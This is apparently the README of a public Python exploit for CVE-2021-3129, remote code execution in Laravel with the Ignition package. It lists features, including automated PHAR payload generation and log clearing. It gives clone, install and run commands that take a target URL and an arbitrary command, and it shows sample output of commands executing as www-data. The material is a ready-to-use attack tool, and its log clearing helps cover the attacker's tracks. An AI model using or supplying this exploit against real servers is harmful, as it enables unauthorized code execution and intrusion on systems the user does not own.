## https://sploitus.com/exploit?id=17EE6C09-2538-52A3-8C5C-973170ACDF29
# CVE-2021-3129 Laravel Ignition RCE Exploit
This is a Python exploit script for CVE-2021-3129, a remote code execution vulnerability in Laravel when the Ignition package is installed. This vulnerability allows an attacker to execute arbitrary system commands via PHAR deserialization.
## Features
- Automatically generates the PHAR payload using `phpggc`
- Accepts user input for any command to execute (e.g., `id`, `whoami`, etc.)
- Automates the entire exploitation process, including clearing logs, injecting the payload, converting logs to PHAR, and triggering the deserialization
## Prerequisites
- Python 3.x
- `requests` library
- PHP installed on your system
- [phpggc](https://github.com/ambionics/phpggc) installed (for generating PHAR payloads)
## Installation
1. Clone the repository:
```bash
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
```
2. Install required Python packages:
```bash
pip install requests
```
3. Run the script with the desired target and command:
```bash
python3 CVE-2021-3129.py http://example.com --cmd 'id'
```
Example output:
```bash
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
```
## Arguments
- `target` (required): The URL of the vulnerable Laravel application.
- `--cmd` (optional): The command to be executed on the target (default: `whoami`).
- `--log_path` (optional): The log file path to be used (default: `../storage/logs/laravel.log`).
## POC
![POC](POC/1.png)
![POC](POC/2.png)